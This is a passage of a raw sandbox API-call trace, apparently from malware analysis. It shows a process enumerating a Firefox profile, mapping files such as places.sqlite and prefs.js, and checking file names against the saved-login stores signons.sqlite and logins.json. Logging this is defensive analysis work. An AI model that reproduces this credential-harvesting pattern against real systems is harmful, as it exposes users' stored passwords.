dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.537] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0589.537] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.537] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.537] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.537] CloseHandle (hObject=0x66c) returned 1 [0589.537] CloseHandle (hObject=0x668) returned 1 [0589.537] LocalFree (hMem=0x56c300) returned 0x0 [0589.537] LocalFree (hMem=0x56afc8) returned 0x0 [0589.537] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.537] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0589.537] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0589.537] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.537] lstrlenW (lpString="\\") returned 1 [0589.537] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.538] lstrlenW (lpString="minidumps") returned 9 [0589.538] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0589.538] LocalFree (hMem=0x578c30) returned 0x0 [0589.538] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.538] lstrlenW (lpString="\\*.*") returned 4 [0589.538] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.538] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.538] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.538] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.538] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.538] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.538] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0 [0589.538] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.538] LocalFree (hMem=0x56afc8) returned 0x0 [0589.538] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.538] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.538] lstrlenW (lpString="\\") returned 1 [0589.538] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.538] lstrlenW (lpString="parent.lock") returned 11 [0589.538] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0589.538] LocalFree (hMem=0x578c30) returned 0x0 [0589.538] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.538] CloseHandle (hObject=0x668) returned 1 [0589.538] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.538] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.538] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0589.538] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.538] CloseHandle (hObject=0x668) returned 1 [0589.538] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.538] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.538] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.538] CloseHandle (hObject=0x668) returned 1 [0589.539] LocalFree (hMem=0x578c30) returned 0x0 [0589.539] StrStrIW (lpFirst="parent.lock", lpSrch="signons.sqlite") returned 0x0 [0589.539] StrStrIW (lpFirst="parent.lock", lpSrch="logins.json") returned 0x0 [0589.539] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.539] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.539] lstrlenW (lpString="\\") returned 1 [0589.539] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.539] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.539] lstrlenW (lpString="permissions.sqlite") returned 18 [0589.539] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.539] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.539] LocalFree (hMem=0x578c30) returned 0x0 [0589.539] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.539] CloseHandle (hObject=0x668) returned 1 [0589.539] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.539] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.539] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0589.539] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.539] CloseHandle (hObject=0x668) returned 1 [0589.539] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.539] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.539] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.539] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.540] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.540] CloseHandle (hObject=0x66c) returned 1 [0589.540] CloseHandle (hObject=0x668) returned 1 [0589.540] LocalFree (hMem=0x56c300) returned 0x0 [0589.540] LocalFree (hMem=0x56afc8) returned 0x0 [0589.540] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.540] lstrlenW (lpString="\\") returned 1 [0589.540] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.540] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.540] lstrlenW (lpString="places.sqlite") returned 13 [0589.540] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.540] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.540] LocalFree (hMem=0x578c30) returned 0x0 [0589.540] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.540] CloseHandle (hObject=0x668) returned 1 [0589.540] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.540] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.540] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0589.541] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.541] CloseHandle (hObject=0x668) returned 1 [0589.541] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.541] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0589.541] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.541] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.634] LocalFree (hMem=0x56c300) returned 0x0 [0589.634] LocalFree (hMem=0x56afc8) returned 0x0 [0589.634] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.634] lstrlenW (lpString="\\") returned 1 [0589.634] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.634] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.634] lstrlenW (lpString="pluginreg.dat") returned 13 [0589.634] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.634] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.634] LocalFree (hMem=0x578c30) returned 0x0 [0589.634] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.634] CloseHandle (hObject=0x668) returned 1 [0589.634] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.634] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.634] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0589.635] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.635] CloseHandle (hObject=0x668) returned 1 [0589.635] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.635] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0589.635] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.635] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.635] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.635] CloseHandle (hObject=0x66c) returned 1 [0589.635] CloseHandle (hObject=0x668) returned 1 [0589.635] LocalFree (hMem=0x56c300) returned 0x0 [0589.635] LocalFree (hMem=0x56afc8) returned 0x0 [0589.635] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.635] lstrlenW (lpString="\\") returned 1 [0589.635] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.635] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.635] lstrlenW (lpString="prefs.js") returned 8 [0589.635] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.635] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1d10 [0589.635] LocalFree (hMem=0x578c30) returned 0x0 [0589.635] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.636] CloseHandle (hObject=0x668) returned 1 [0589.636] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0589.636] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c30 [0589.636] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x578c30, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0589.636] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.636] CloseHandle (hObject=0x668) returned 1 [0589.636] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.636] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0589.636] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.636] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.636] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.636] CloseHandle (hObject=0x66c) returned 1 [0589.636] CloseHandle (hObject=0x668) returned 1 [0589.636] LocalFree (hMem=0x578c30) returned 0x0 [0589.636] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.636] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.636] lstrlenW (lpString="\\") returned 1 [0589.636] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.637] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.637] lstrlenW (lpString="search.json") returned 11 [0589.637] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.637] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0589.637] LocalFree (hMem=0x578c30) returned 0x0 [0589.637] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.637] CloseHandle (hObject=0x668) returned 1 [0589.637] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.637] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.637] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0589.637] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.637] CloseHandle (hObject=0x668) returned 1 [0589.637] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.637] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0589.637] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.637] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.637] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.638] CloseHandle (hObject=0x66c) returned 1 [0589.638] CloseHandle (hObject=0x668) returned 1 [0589.638] LocalFree (hMem=0x578c30) returned 0x0 [0589.638] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.638] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.638] lstrlenW (lpString="\\") returned 1 [0589.638] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.638] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.638] lstrlenW (lpString="secmod.db") returned 9 [0589.638] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.638] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0589.638] LocalFree (hMem=0x578c30) returned 0x0 [0589.638] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.638] CloseHandle (hObject=0x668) returned 1 [0589.638] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0589.638] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578c30 [0589.638] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x578c30, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0589.638] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.638] CloseHandle (hObject=0x668) returned 1 [0589.638] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.638] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0589.638] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.638] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, 